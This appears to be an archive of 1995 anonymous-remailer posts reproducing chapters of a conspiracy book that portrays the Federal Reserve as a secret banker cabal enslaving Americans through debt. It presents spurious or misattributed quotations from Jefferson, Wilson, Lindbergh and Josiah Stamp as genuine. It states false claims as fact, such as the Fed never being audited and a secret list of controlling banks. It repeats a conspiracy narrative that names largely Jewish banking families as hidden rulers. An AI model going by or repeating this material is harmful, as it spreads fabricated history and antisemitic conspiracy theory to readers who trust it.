Some, who are especially vocal in their exposure of the treason committed against our people, are harassed by government agencies such as the IRS, FDA, EPA, OSHA, and others, causing them financial loss or bankruptcy. Sometimes their businesses and homes are violently raided at gunpoint, and their money, currency, equipment, and records confiscated, so it is very difficult, if at all possible, to continue their business. In Chapter One the National Commodity and Barter Association was mentioned as an example of such raids. But the most striking case has been that of Ezra Pound, which is covered below.

Using these methods, the Federal Reserve bankers and their agents have been completely successful in preventing most Americans from learning the things you are reading in this report. However, in spite of their control of information, they realize that more and more citizens are learning the truth.
Therefore, to prevent retaliation and armed resistance to their plunder of America, they plan to register all firearms and eventually disarm all citizens. They want to eliminate all guns not in the hands of their government police or army. Our wise Founding Fathers wrote the Second Amendment to the Constitution so that the people could protect themselves against the government.

Love of life, interest in your freedom, compassion for humanity, concern for your children, and the safety of all you have worked for should make you deeply interested in this, America's greatest problem. Our generation has not suffered under the bankers' yoke as the coming generations will. Usury and taxes will continue to take a larger and larger part of the earnings of the people and put them deeper into the pockets of the bankers and their agents. Increasing "government" regulations will prevent citizen protest and opposition to their control. Is it possible that your grandchildren will own neither car nor home, but will live in "government-owned" apartments and ride to work in "government-owned" buses, and be allowed to keep just enough of their earnings to buy a minimum of food and clothing, while their rulers wallow in luxury? In Asia and Eastern Europe this used to be called communism. In America it is called democracy or capitalism.

Horace Greeley stated, "While boasting of our noble deeds, we are careful to conceal the ugly fact that by an iniquitous currency system we have nationalized a system of oppression which, though more refined, is no less cruel than the old system of chattel slavery."

THE CASE OF EZRA POUND

Ezra Pound was a poet, one of America's greatest - if not the greatest. He played a major role in the development of writers and poets, such as E.E. Cummings, T.S. Eliot, Robert Frost, Ernest Hemingway, James Joyce, and William Carlos Williams. He also studied politics, economics, banking, and monetary theory. He disapproved of war.
During World War II, he hid a number of Jews from the Nazi exterminators; if discovered the penalty would have been death. He broadcast a series of talks on Italian radio aimed at Americans. He had wanted America to stay out of the war, and he said some uncomplimentary things about President Franklin D. Roosevelt. He also stated some of his political and monetary ideas. He was accused of being a traitor. At the end of the war he was imprisoned in an American concentration camp near Pisa, Italy for six months without trial. Then he was transferred to America where he was declared insane and imprisoned in a mental hospital in Washington D.C. for thirteen years. After which the treason charges, for which he had never stood trial, were dropped, and he was released. He returned to Italy, where he lived until his death in 1972.

The reason he was not tried seems to be that his prosecutors didn't have a case that would hold up in court and/or they were afraid that he would repeat in court what he had said over the radio in Italy. Wendell Muncie, M.D., one of the psychiatrists involved in his "sanity hearing," said that Pound's insanity consisted of three factors: his passion for the U.S. Constitution, his espousal of the Confucian ethic, and his desire for world peace. No formal diagnosis of Pound's supposed "insanity" has been found. His captors in Washington openly admitted that Pound was a political prisoner. A Congressional investigation started in 1957 and completed in 1958 exposed the inadequacy of the case against Pound and led to his release.

Here are some extracts from Pound's radio talks:

. "I think an alliance with Stalin's Russia is rotten." (January 29, 1942)

. "Liberty is not a right but a duty." (March 8, 1942)

. "Sovereignty inheres in the right to issue money. And the American sovereignty belongs by right to the people, and their representatives in Congress have the right to issue money and to determine the value thereof.
And 120 million, 120 million suckers have lamentably failed to insist on the observation of this quite decided law.... Now the point at which embezzlement of the nation's funds on the part of her officers becomes treason can probably be decided only by jurists, and not by hand-picked judges who support illegality." (April 9, 1942)

. Quotes read by Pound: 1. "'I believe that banking institutions are more dangerous to our liberties than standing armies.' - Thomas Jefferson. 2. 'I have two great enemies, the southern army in front of me and the financial institutions in the rear. Of the two, the one in the rear is the greatest enemy.' - Abraham Lincoln. 3. 'The money power preys upon the nation in times of peace and conspires against it in times of adversity. It is more despotic than monarchy, more insolent than autocracy, more selfish than bureaucracy; it denounces as public enemies all who question its methods, or throw light upon its crimes.' - William Jennings Bryan." (July 26, 1942)

. Back to Pound's own words: "Wars in old times were made to get slaves. The modern implement of imposing slavery is debt." (March 25, 1943)

. "The phase of the usury system which we are trying to analyze is more or less Patterson's perception that the Bank of England could have benefit of all the interest on all the money that it creates out of nothing.... Now the American citizen can, of course, appeal to his constitution, which states that Congress shall have power to coin money or regulate the value thereof and of foreign coin. Such appeal is perhaps quixotic." (March 30, 1943)

. "That text is known to them that have the patience to read it, possibly one-hundredth of one percent of the denizens. They forget it, all save a few Western states. I think somebody in Dakota once read it. The Constitution."
(June 30, 1943)

THE FEDERAL RESERVE SYSTEM IS UNCONSTITUTIONAL AND ILLEGAL

Although there has never been a court case that challenged the legality of the Federal Reserve System, there was a challenge to the National Recovery Act or NRA, which was ruled unconstitutional. The U.S. Supreme Court - Schechter Poultry v. U.S., 29 U.S. 495, 55 U.S. 837.842 (1935) - ruled that, "Congress may not ABDICATE OR TRANSFER TO OTHERS ITS LEGITIMATE FUNCTIONS.." Article I, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value thereof..." By passing the Federal Reserve Act, Congress abdicated and transferred to the Federal Reserve bankers its constitutionally legitimate function of issuing and controlling money. If the Supreme Court ruling on the NRA is applied to the Federal Reserve System, the unconstitutionality and illegality of the Fed becomes obvious.

TELL THE PEOPLE

America will not shake off her illegal banker-controlled dictatorship as long as the people are ignorant of the hidden controllers. International bankers, who control most of the governments of the nations and most sources of information, seem to have us completely in their grasp. They are afraid of only one thing: an awakened citizenry armed with the truth. An ignorant citizen is the banker-government's best "client." An informed citizen is the banker-government's worst nightmare.

Robert H. Hemphill, Credit Manager of the Federal Reserve Bank of Atlanta Georgia, said:

"This is a staggering thought. We are completely dependent on the commercial banks. Someone has to borrow every dollar we have in circulation, cash, or credit. If the banks create ample synthetic money, we are prosperous; if not, we starve. We are absolutely without a permanent money system. When one gets a complete grasp of the picture, the tragic absurdity of our hopeless position is almost incredible, but there it is.
It is the most important subject intelligent persons can investigate and reflect upon. It is so important that our present civilization may collapse unless it becomes widely understood and the defect remedied very soon."

PRIVATE BANKING

In California a very private "non-bank" has been operating successfully for fifteen years. It caters for accounts in gold or Federal Reserve Notes. It is completely private and doesn't report to anyone. It pays interest on both gold and Federal Reserve Note balances. Ideally, we need to establish a network of private banks throughout the country, and eventually throughout the rest of the world. See Chapter Twelve.

From anon-remailer at utopia.hacktic.nl Wed Sep 27 23:11:31 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Sep 95 23:11:31 PDT
Subject: No Subject
Message-ID: <199509280611.HAA02217@utopia.hacktic.nl>

This is the best description of debt currency I've seen. Debt currency is today's most effective form of slavery. It is today's American slavery.

The text is from the book: THE ECONOMIC RAPE OF AMERICA WHAT YOU CAN DO ABOUT IT by Frederick Mann of Terra Libra

The book costs $19.95 plus $2 postage and handling. It can be ordered from: Terra Libra, 2430 E. Roosevelt #998, Phoenix, Az 85008

CHAPTER THREE

THE FEDERAL RESERVE BANKERS

Then Jesus entered the temple and drove out all who were selling and buying in the temple, and he overturned the tables of the money changers and the seats of those who sold doves. He said to them, "It is written, 'My house shall be called a house of prayer'; but you are making it a den of robbers." Matthew 21, verses 12-13

"All of the perplexities, confusion, and distress in America arises, not from the defects of the Constitution or Confederation, not from want of honor or virtue, so much as from downright ignorance of the nature of coin, credit, and circulation." John Adams, Founding Father (In a letter to Thomas Jefferson, 1787)

Congressman Louis T.
McFadden said the following during a speech before Congress on June 10, 1932:

"Mr. Chairman, we have in this country one of the most corrupt institutions the world has ever known. I refer to the Federal Reserve Board and the Federal Reserve Banks. The Federal Reserve Board, a government board, has cheated the Government of the United States and the people of the United States out of enough money to pay the national debt. The depredations and the iniquities of the Federal Reserve Board and the Federal Reserve banks acting together have cost this country enough money to pay the national debt several times over. This evil institution has impoverished and ruined the people of the United States; has bankrupted itself, and has practically bankrupted our government. It has done this through the defects of the law under which it operates, through the maladministration of that law by the Federal Reserve Board, and through the corrupt practices of the moneyed vultures who control it.

Some people think the Federal Reserve banks are United States Government institutions. They are not government institutions. They are private credit monopolies which prey upon the people of the United States for the benefit of themselves and their foreign swindlers; and rich and predatory money lenders. In that dark crew of financial pirates there are those who would cut a man's throat to get a dollar out of his pocket; there are those who send money into states to buy votes to control our legislation; and there are those who maintain an international propaganda for the purpose of deceiving us and wheedling us into the granting of new concessions which will permit them to cover up their past misdeeds and set again in motion their gigantic train of crime."

PERVASIVE MONEY PROBLEMS IN AMERICA

Americans, living in "the richest nation on earth," always seem to be short of money. Women are working in unprecedented numbers, men hope for overtime hours to earn more.
Many take part-time jobs evenings and weekends. Children look for odd jobs to earn spending money. But the family debt climbs higher. And psychologists say one of the biggest causes of family quarrels and breakups is "arguments over money." Much of this trouble can be traced to our "counterfeit money" system, which leaves government free to perpetrate the most destructive monetary and economic crimes.

On the national scale, in just ten years the federal debt has grown from less than one trillion dollars to over four trillion. (In Chapter Nine we will discover that the real national debt is much bigger.) The annual interest on that debt is over $250 billion. And now we are told (not asked) that we must come up with between $200 billion and $500 billion to "save" the S & L institutions. All this for only one reason: to protect and perpetuate a fundamentally flawed system whose only object is to enrich and empower the Federal Reserve bankers who own and operate the system.

During the last few years America has become by far the largest debtor nation of the world. And our politicians have made their "contributions" with boundless "generosity!" John Danforth, Republican senator from Missouri, was reported in the Arizona Republic of April 21, 1992 as follows:

"I have never seen more senators express discontent with their jobs... I think the major cause is that, deep down in our hearts, we have been accomplices to doing something terrible and unforgivable to this wonderful country. Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have defrauded our country to get ourselves elected."

PAPER CURRENCY CAN BE A VERY PROFITABLE HUMAN CREATION

Economists use the word "create" when speaking of the process by which paper currency comes into existence. "Creation" means making something that did not exist before.
Lumbermen make boards from trees, workers build houses from lumber, and factories manufacture automobiles from metal, glass, and other materials. But in all these cases they did not CREATE. They only changed existing materials into more usable and more valuable forms. Not so with currency. Here we actually CREATE something out of nothing. A piece of paper of little value is printed so it becomes worth a piece of lumber. That difference in value is literally CREATED out of nothing. And with different numbers printed on the piece of paper, it can buy the automobile or even the house. The VALUE of the paper has been CREATED in the true sense of the word.

Paper currency can be created honestly or fraudulently. Gold and silver certificates, being receipts for gold and silver, with a guarantee to pay the bearer on demand, are honest paper currency. Federal Reserve Notes currently in circulation constitute fraudulent, counterfeit paper currency. Counterfeit paper currency is very cheap to "create," and whoever prints it makes a huge profit! Builders work hard to make a profit of 5% above their cost in building a house. Auto makers sell their cars 1% to 2% above the cost of manufacture, which is considered good business. But counterfeit paper currency "manufacturers" have no limit on their profits since a few cents will print a $1 bill, a $100 bill, or even a $10,000 bill.

THE DANGER OF A MONOPOLISTIC CENTRAL BANK

Thomas Jefferson understood the danger of putting the power to control the currency of a nation in the hands of a few individuals in the form of a MONOPOLISTIC central bank. This is why he opposed Alexander Hamilton's scheme to establish the First Bank of the United States.
Let me repeat what he said in 1791:

"If the American people ever allow the banks to control issuance of their currency, first by inflation and then by deflation, the banks and corporations that grow up around them will deprive the people of all property until their children will wake up homeless on the continent their fathers occupied."

President Andrew Jackson also understood the danger. He refused to renew the charter (a grant of MONOPOLY) of the Second Bank of the United States. In 1836 Jackson said to the bankers trying to persuade him to renew their charter (so they could continue their harmful MONOPOLY):

"You are a den of vipers. I intend to rout you out and by the Eternal God I will rout you out. If the people only understood the rank injustice of our money and banking system, there would be a revolution before morning."

On December 22, 1913, the day before President Woodrow Wilson signed the Federal Reserve Act, Congressman Charles A. Lindbergh Sr. (father of the famous aviator) said to the House:

"This Act establishes the most gigantic trust [*] on earth. When the President signs this bill, the invisible government by the Monetary Power will be legalized. The people may not know it immediately, but the day of reckoning is only a few years removed. The trusts [*] will soon realize that they have gone too far even for their own good. The people must make a declaration of independence to relieve themselves from the Monetary Power. This they will be able to do by taking control of Congress. Wall Streeters could not cheat us if you Senators and Representatives did not make a humbug of Congress... The greatest crime of congress is its currency system. The worst legislative crime of the ages is perpetrated by this banking bill. The caucus and the party bosses have again operated and prevented the people from getting the benefit of their own government."
[* At that time the word "trust" was synonymous with "MONOPOLY."]

THE DEPRESSION OF THE 1930s

In 1930 America did not lack industrial capacity, fertile farmland, skilled or willing workers, or industrious families. It had an extensive and highly efficient transportation system in railroads, road networks, and inland and ocean waterways. Communications between regions and localities were the best in the world, utilizing telephone, teletype, radio, and a well-operated mail system. No war had ravaged the cities or the countryside, no pestilence weakened the population, nor had famine stalked the land.

In AMERICA'S GREAT DEPRESSION, Murray N. Rothbard, Professor of Economics at the University of Nevada, Las Vegas, describes how the creation of the Federal Reserve System increased the bankers' ability to inflate the currency supply sixfold. During 1923 to 1929 the bankers did inflate the currency supply enormously. Such an artificial inflation inevitably brings about a subsequent need for deflation. Federal Reserve bankers, the source of America's currency and credit, reduced the currency supply by refusing loans to stable and growing industries, stores, and farmers. At the same time they demanded payment on existing loans. They also increased interest rates. Currency was rapidly taken out of circulation and was not replaced. America was put in a depression and in deep trouble. Goods were available to be purchased, jobs waiting to be done, but little currency was available. Twenty-five percent of workers were laid off. Banks took possession of tens of thousands of farms and businesses through foreclosure. Gloom settled over America. The contraction of the currency supply caused the stock market to collapse and the ensuing depression.
Seven months before the collapse, Paul Warburg, the main architect of the Federal Reserve System, in his annual report to the stockholders of his International Acceptance Bank, wrote: "If the orgies of unrestrained speculation are permitted to spread, the ultimate collapse is certain not only to affect the speculators themselves, but to bring about a general depression involving the entire country." Both the inflation and the deflation, causing the depression, had been planned - as predicted by Jefferson in 1791!

CURRENCY INFLATION ENDED THE "GREAT DEPRESSION"

The depression lasted until 1939, when the Federal Reserve System began to send large amounts of currency into circulation for military preparedness. As soon as the currency supply went up, people were hired back to work, farms sold their produce instead of plowing it under, mines reopened, factories began to hum, both industrial and residential construction began anew, and the "Great Depression" was over. Some politicians were blamed for it and others took credit for ending it. The truth was that bankers caused it and bankers ended it. The people were never told that simple truth. The bankers who "manufacture" and "control" our currency have used their huge profits to "buy" our politicians, and ultimately to control our government.

POWER TO COIN AND REGULATE MONEY

When we see the disastrous results of an artificially created shortage of currency, we can better understand why our Founding Fathers insisted on placing the power to create and control money in the hands of Congress. Article I, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value thereof..." But in 1913 Congress passed the "Federal Reserve Act," relinquishing the power to create and control money to the Federal Reserve Corporation, a private company owned and controlled by bankers. The word "Federal" was used only to deceive the people. The term "central bank" was carefully avoided.
The Federal Reserve Act created a Board of Directors, the Federal Reserve Board, to run the Federal Reserve Corporation with a MONOPOLY to create and control the currency of the United States. This infamous legislation was accompanied with appropriate fanfare and propaganda that it would "remove money from politics" and "prevent boom and bust from hurting our citizens." The people were not told then, and still do not know today, that the Federal Reserve Corporation is a private MONOPOLY controlled by bankers, operated for the financial gain of the bankers at the expense of the people.

Since that day of infamy a small group of privileged people who lend us "our money," have accrued to themselves all of the profits of printing paper currency - and more! Since 1913 they have created trillions of dollars in currency and credit, which as their own personal property, they then lent to our government and our people, with interest. "The rich get richer and the poor get poorer" had become the secret policy of our national government.

The main architect of the Federal Reserve System was Paul Moritz Warburg, who came from a famous German banking family. The kingpin who steered the Federal Reserve Act through Congress was Senator Nelson Aldrich, Chairman of the Finance Committee. He was the maternal grandfather of Nelson A. Rockefeller, of Standard Oil and Chase Manhattan Bank. Aldrich's daughter, Abby Greene Aldrich, married John D. Rockefeller, Jr. in 1901. At the time, many people regarded Senator Aldrich as the Rockefeller family's mouthpiece in the Senate.

The Federal Reserve Act was passed during the presidency of Woodrow Wilson. Just before he died Wilson is reported to have said that he had been deceived and "I have betrayed my country." He also said:

"A great industrial nation is controlled by its system of credit. Our system of credit has been concentrated. The growth of the nation and all our activities are in the hands of a few men.
We have come to be one of the worst ruled, one of the most completely controlled and dominated governments in the world - no longer a government of free opinion, no longer a government by conviction and vote of the majority, but a government by the opinion and duress of small groups of dominant men."

WHO OWNS THE FEDERAL RESERVE?

There has been much speculation about who owns the Federal Reserve Corporation. It has been one of the best kept secrets of the century, because the Federal Reserve Act of 1913 provided that the names of the owner banks be kept secret. However, R.E. McMaster, publisher of the newsletter THE REAPER, asked his Swiss banking contacts which banks hold the controlling stock in the Federal Reserve Corporation. The answer:

1. Rothschild Banks of London and Berlin
2. Lazard Brothers Bank of Paris
3. Israel Moses Sieff Banks of Italy
4. Warburg Bank of Hamburg and Amsterdam
5. Lehman Brothers Bank of New York
6. Kuhn Loeb Bank of New York
7. Chase Manhattan Bank of New York
8. Goldman Sachs Bank of New York.

In THE SECRETS OF THE FEDERAL RESERVE, Eustace Mullins indicates that, because the Federal Reserve Bank of New York sets interest rates and controls the daily supply and price of currency throughout the U.S., the owners of that bank are the real directors of the entire system. Mullins states:

"The shareholders of these banks which own the stock of the Federal Reserve Bank of New York are the people who have controlled our political and economic destinies since 1914. They are the Rothschilds, Lazard Freres (Eugene Mayer), Israel Sieff, Kuhn Loeb company, Warburg Company, Lehman Brothers, Goldman Sachs, the Rockefeller family, and the J.P. Morgan interests."

THEY PRINT IT - WE BORROW IT AND PAY THEM INTEREST

An example of the process of currency creation and its conversion into "people's debt" will aid our understanding.
The Federal Government, having spent more than it has taken from its citizens in taxes, needs (for the sake of illustration) $1 billion. Since it does not have the currency, and Congress has given away its authority to create it, the government must go to the creators for the $1 billion. But the Federal Reserve, a private corporation, does not give its currency away for free! The bankers are willing to deliver $1 billion in currency or credit to the federal government in exchange for the government's agreement to pay it back with interest. So Congress authorizes the Treasury Department to print $1 billion in U.S. Bonds, which are then delivered to the Federal Reserve bankers. (The bonds are a kind of "IOU" that bears interest.)

The U.S. Treasury prints $1 billion in bank notes. The printing cost is about $20.62 per 1,000 bills - it costs the same irrespective of the denomination - the cost of printing a $1 note is about the same as for a $100 note: about .0206 cents. The Federal Reserve "buys" these bills from the U.S. Treasury, paying only for the printing costs. The bills are then exchanged at full face value for the bonds. The government uses the currency to pay its obligations. What are the results of this fantastic transaction? Well, the government's bills are paid all right, but the U.S. Government has now indebted the people to the Federal Reserve bankers for $1 billion plus interest!

Since this process has been going on since 1913, the people are now indebted to the bankers to the tune of trillions of dollars. The people are taxed billions of dollars each month just to pay the interest on this "national debt." With both the principal and the interest climbing every month, there is no hope of ever paying off this "debt." The working people of the United States now "owe" the approximately 300 banking families and their consorts more than the assessed value of all the assets in the United States.
And realize, the bankers got all this for the cost of paper, ink, and bookkeeping!

THE MOUNTAIN OF DEBT

You say this is terrible! Yes it is, but this is only part of the sordid story. Under this "debt-currency" system, those U.S. Bonds referred to above have now become assets of the banks, called their "reserve." Regular commercial banks use these assets to issue loans to individual and commercial customers. Since the banking laws require only about a 12% reserve, this means the banking fraternity can lend up to eight times the amount of the bonds they have on hand. As a result of the $1 billion discussed here, they can lend $8 billion to private customers at interest. This means that together with the $1 billion lent to the government, the bankers can lend out $9 billion at interest for the original cost to them of about $400,000 for the printing! And because the Federal Reserve bankers have been granted a MONOPOLY, the only way our people and businesses can get currency to carry on trade and expand industry and farming is to borrow it from the bankers!

USING DEBT TO EXPAND CONTROL

In addition to the vast wealth drawn to them through this almost unlimited usury, the bankers who control the currency are able to approve or disapprove large loans to big and successful corporations. Bankers can refuse a loan, thereby depressing the price of a corporation's shares on the stock exchange. This enables the bankers' agents to buy large blocks of the shares at depressed prices. Then they can approve a multi-million dollar loan to the corporation, resulting in its share price rising, allowing the bankers' agents to sell the shares, sometimes making huge profits. In this manner billions of dollars are made to buy even more shares. Using this method since 1913, the bankers and their agents have purchased secret or open control of almost every large corporation in America.
Using that control, they force the corporations to borrow huge sums from their banks so that corporate earnings are partially siphoned off in the form of interest paid to the banks. This leaves little "actual profit" to be paid out as dividends.

When bankers lend more, the currency supply expands. When they rein in the loans, the currency supply contracts. By expanding or contracting the currency supply, the bankers can make the stock market go up or down at their pockets' content! They can cause "busts and booms" almost as they wish. That is why President James A. Garfield said, "Whoever controls the volume of money in any country is absolute master of all industry and commerce."

At the time of writing (July, 1992), the New York stock market has been hovering around record highs for months, while the economy continues to suffer a protracted slump. The bankers no doubt want the stock market to be high and the economy to recover before the coming presidential election. Keep in mind that they endorse all three presidential candidates. Tweedledum and Tweedledee; or Louie, Huey, and Dewey; or Larry, Mo, and Curly - they are all in the hands of the bankers.

WHY LOANS EVENTUALLY SHRINK THE CURRENCY SUPPLY

The only way new currency goes into circulation in America under this wicked system is when someone borrows it from a banker. When people are confident of success, they borrow more currency, which increases the currency supply, and all seem to prosper for a while. Then, as they pay off their loans, the available currency supply shrinks and currency becomes "scarce." Borrowers must always take more currency out of circulation when they repay their loans than they put in circulation when they receive their loans. Interest and charges make the repayment total larger than the loan. This means that only more people borrowing still more can keep the medium of exchange available to the nation. This example may aid understanding.
When a citizen goes to a banker to borrow $100,000 to purchase a home or a farm, and the loan is granted, the banker gives the borrower a check for $100,000 or credits the borrower's account with $100,000. The borrower, in turn, writes the necessary checks to the builder, seller, subcontractors, etc. (who, in turn, write more checks), thereby putting $100,000 of "checkbook currency" into circulation. However, on a 30-year mortgage with 10% interest, the banker wants $828 per month, or a total of $316,080. The buyer must take that $316,080 out of circulation, reducing the overall amount in circulation by $216,080. The banker has not really produced anything of value, except the slip of paper called a check or deposit slip. Yet the banker ends up having $216,080 more than he had before, minus a few hundred dollars of clerical and office costs. But the people, as a whole, have $216,080 less.

WHY SMALL LOANS HAVE THE SAME EFFECT

For those who haven't quite grasped the impact, let us consider an auto loan for only three years. Step one: citizen borrows $6,000 and pays it into circulation (to the dealer, factory, etc.). Citizen agrees to repay the banker $7,200. Step two: Citizen pays $200 per month. In 36 months citizen has taken $7,200 out of circulation and paid it to the bank. Net result? $1,200 less currency in circulation.

Since currency requirements increase with expanding population, industry, and commerce, and paying off any loan decreases the available currency supply, it is clear that we would quickly run out of currency, unless more and more people borrow more and more currency to keep currency in circulation! Multiply the above examples by hundreds of millions of times since 1913, and you can see why America has fallen from a prosperous debt-free nation to the most debt-ridden country in the world. Practically every home, farm, and business is heavily mortgaged to the bankers.
Practically all our cars, furniture, and clothes are purchased with borrowed currency. The interest to the bankers on personal, state, and federal debt totals more than 25% of the combined earnings of the working population!

THE COST TO THE BANKERS? PRACTICALLY NOTHING

In the tens of millions of transactions made each year like those shown here, relatively few bank notes change hands, nor is it necessary

From anon-remailer at utopia.hacktic.nl Wed Sep 27 23:11:38 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Sep 95 23:11:38 PDT
Subject: No Subject
Message-ID: <199509280611.HAA02220@utopia.hacktic.nl>

that they do. 95% of all "cash" transactions in the U.S. are by check. Checks are thus effectively also currency. The banker creates the so-called "loan" by writing a check or deposit slip, not against actual money, but against your promise to pay back the loan. The only cost to the bank is the paper, ink, and a few dollars in salaries and office costs for each transaction. It is "check-kiting" on an enormous scale! The profits are enormous as shown below.

THE COST TO YOU? PRACTICALLY EVERYTHING

In 1910 the U.S. federal debt was $1,147,000,000 - $12 per citizen. State and local debts were practically non-existent, and government was small and not oppressive. By 1920, after only six years of the Federal Reserve handling our currency, the federal debt had jumped to $24 billion - $228 per citizen. The Federal Government began to grow like an invisible cancer in its early stages. By 1968 the federal debt had jumped to $347 billion - $1,717 per citizen. Ten years later, by 1978 it had doubled again to $763 billion - $3,500 per citizen. That is a debt of $17,500 for every family of five in America. Federal debt has been growing faster and faster since. And the Federal Government has become a debilitating cancer rapidly sapping and weakening its victim. Today in 1992 the federal debt is over $4 trillion.
(And they "cook the books" on the low side to come up with that figure - see Chapter Nine.) The $4 trillion national debt amounts to $16,000 per citizen, or $80,000 per family of five. And if that debt were calculated in terms of working or tax-paying families, it would be considerably higher. The Federal Government has become a bloated, out-of-control parasite, a terminal cancer. The economy seems so weak that even after many months of blowing up the currency supply, signs of recovery have to be searched for. The entire system may be on the brink of complete collapse.

The above figures do not include state, municipal, school district, business, or personal debts, which total an additional $3 trillion. Total debt in America is thus over $7 trillion - $28,000 per citizen - $120,000 per family of five. This is more than twice the assessed value of all the land and buildings in America. Effectively all of America has been signed over to the bankers. They can take America and we would still owe them another America! Of course, it is to their advantage not to take actual title to the property, so we will not realize that we really own nothing. Instead they leave us with "ownership" so we will willingly continue to work and pay ever higher tributes to the bankers. What we really have is national bankruptcy.

Let me repeat the words of Senator John Danforth: "I have never seen more senators express discontent with their jobs... I think the major cause is that, deep down in our hearts, we have been accomplices to doing something terrible and unforgivable to this wonderful country. Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have defrauded our country to get ourselves elected."
THE INEXORABLE TRANSFER OF WEALTH TO THE BANKERS

To grasp the fact that periodic withdrawal of currency through interest payments to the bankers will inexorably transfer all wealth in the nation to the receivers of interest, imagine yourself in a poker or dice game. Everyone has to buy chips (the medium of exchange) from a "banker" who does not risk chips in the game, but watches the table and every hour reaches in and takes 10% to 15% of all the chips on the table. As the game progresses, the number of chips in the possession of each player will go up and down with his or her "luck." However, the total number of chips available to play the game (carry on business and trade) will decrease steadily, while the "banker's" mountain of chips just grows and grows.

The game will get low on chips, and some players will run out. If they want to continue to play, they must buy or borrow more chips from the "banker." The "banker" will sell (lend) the player more chips only if the player signs a "mortgage" agreeing to give the "banker" some real property (car, home, farm, business, etc.). If the payments should go into default, the banker takes the property. The payments must be made on time, whether the player wins (makes a profit) or not. It is easy to see that no matter how skillfully the players play, eventually the "banker" will end up with all of his chips back. Except for the very best or "luckiest" players, the rest, if they stay in the game long enough, will end up owing to the "banker" their cars, their homes, their farms, their businesses, and perhaps even their watches, rings, and the shirts off their backs!

Sir Josiah Stamp, President of the Bank of England in the 1920s, and the second richest man in Britain at the time, said: "Banking was conceived in iniquity and was born in sin. The bankers own the earth. Take it away from them but leave them in power to create deposits, and with the flick of the pen they create enough deposits to buy it back again.
However, take it away from them, and all the great fortunes like mine will disappear, and they ought to disappear, for this would be a happier and better world to live in. But, if you wish to remain the slaves of bankers and pay the cost of your own slavery, let them continue to create deposits."

Our real-life situation is much worse than any poker game. In a poker game no one is forced to go into debt, and anyone can quit at any time and keep whatever he or she still has. But in real life, even if we borrow little ourselves from the bankers, the local, state, and federal governments borrow billions in our name, squander it, then confiscate our earnings from us and pay it to the bankers with interest. We are forced to play their game, and it seems we can only leave the game by dying. We pay as long as we live, and our children pay after we die. If we cannot pay, the same government sends the police to take our property and give it to the bankers. The bankers risk nothing (at least, the Federal Reserve bankers) in the game; they just collect their percentage and "win it all."

In Las Vegas all the games are "rigged" to pay the house (owner) a percentage. They rake in millions. The Federal Reserve bankers' "game" is similarly rigged, and it pays off in billions. In recent years bankers have added more "cards" to their game. "Credit" cards are promoted as a convenience and a great boon to trade. Actually, they are ingenious devices by which bankers collect 2% to 5% of every retail sale from the seller and 18% or more interest from buyers. A real stacked deck!

POLITICIANS AND BANKERS IN THE SAME LEAGUE

Democrat, Republican, and Independent voters have wondered why politicians always spend more tax currency than they collect. The reason should now be clear. When you study our "debt-currency" system, you soon realize that the politicians are not the agents of the people.
They are the agents of the Federal Reserve Bankers, for whom they plan ways to place the people further in debt. Let me again quote the words of Senator John Danforth: "I have never seen more senators express discontent with their jobs... I think the major cause is that, deep down in our hearts, we have been accomplices to doing something terrible and unforgivable to this wonderful country. Deep down in our hearts, we know that we have bankrupted America and that we have given our children a legacy of bankruptcy.... We have defrauded our country to get ourselves elected."

Article 1, Section 8 of the U.S. Constitution states, "The Congress shall have power... to coin money, regulate the value thereof..." But what have our politicians done? In 1913 they traitorously gave the U.S. Treasury to the Federal Reserve bankers - lock, stock, and barrel! Someone recently asked, "What's the difference between Kindergarten and Congress?" Answer: "One has adult supervision!" Actually, we shouldn't criticize Congress; after all, we have the best Congress money can buy. Chapter Ten examines Congress in more detail.

FEDERAL RESERVE SYSTEM AUDIT

The Federal Reserve has never been audited by the government. In 1975 a bill, H.R. 4316, to require Federal Reserve audits, was introduced in Congress. Due to pressure from the currency-controllers, it was rejected. No audit of the Federal Reserve has ever been done.

MOUNTING DEBTS AND WARS

We, as a people, are now ruled by a "banker-owned system" that has usurped the mantle of government, disguised itself as our legitimate government, and set about to pauperize and control the people. It is now a centralized, all-powerful apparatus whose main purposes are spending the people's currency, promoting war, and propagandizing to perpetuate itself in power.
Our two large political parties (the "Demopublicans" also called "Republicrats") have become its servants, the various departments of government its spending agencies, and the Internal Revenue Service its collection agency. Unknown to the people, our "banker-owned system" operates in close cooperation with similar apparatuses in other nations, also disguised as "governments." Some, we are told, are friends. Others, we are told, are enemies. "Enemies" are built up through international manipulations and used to frighten the American people into going billions of dollars more into debt to the bankers for "military preparedness," "foreign aid to stop communism," "minority rights," etc. Citizens, deliberately confused by brainwashing propaganda, watch helplessly while our politicians give our food, goods, and gold to banker-controlled alien governments under the guise of "better relations," "easing tensions," or "humanitarian aid." Our banker-controlled government takes our finest and bravest sons and sends them into foreign wars, where tens of thousands are murdered and hundreds of thousands are crippled. Other thousands are morally corrupted and addicted to drugs. When the "war" is over we have gained nothing, but we are scores of billions more in debt to the bankers - which was the real reason for the war in the first place!

MORE THAN JUST ECONOMIC RAPE

The profits from these massive debts have been used to erect a complete and almost hidden economic and political colossus over our nation. Our "banker-owned system" keeps telling us they are trying to do us good, when in truth they work to harm and injure the people. These would-be despots know it is easier to control and rob an ignorant, poorly-educated, and confused people than it is an informed population, so they deliberately degrade our educational systems. For the same reason they secretly favor drug use, alcohol, racial conflict, and crime in general.
Their "war on drugs," as an example, only produces more drug use and a host of related crimes. Everything which debilitates the minds and bodies of the people is secretly encouraged, as it makes the people less able to oppose them, or even to understand what is being done to them. The system wants mediocre, unthinking, helpless "sheople." Family, morals, and all that is honorable is being swept away, while our "banker-owned system" builds their new subservient man, the foundation of their "new world order." Our new rulers are trying to change our whole political, social, and racial order, but they will not change the debt-currency economic system by which they rob and rule. Our people have become tenants and "debt-slaves" to the bankers and their agents in the land our fathers conquered. It is conquest through the most gigantic fraud and swindle in the history of humankind. And we remind you again: The key to their wealth and power over us is their MONOPOLISTIC ability to "create" currency out of nothing and to lend it to us at interest. If Congress had not allowed them to do that, they never would have gained secret control over our nation.

CONTROLLED NEWS AND INFORMATION

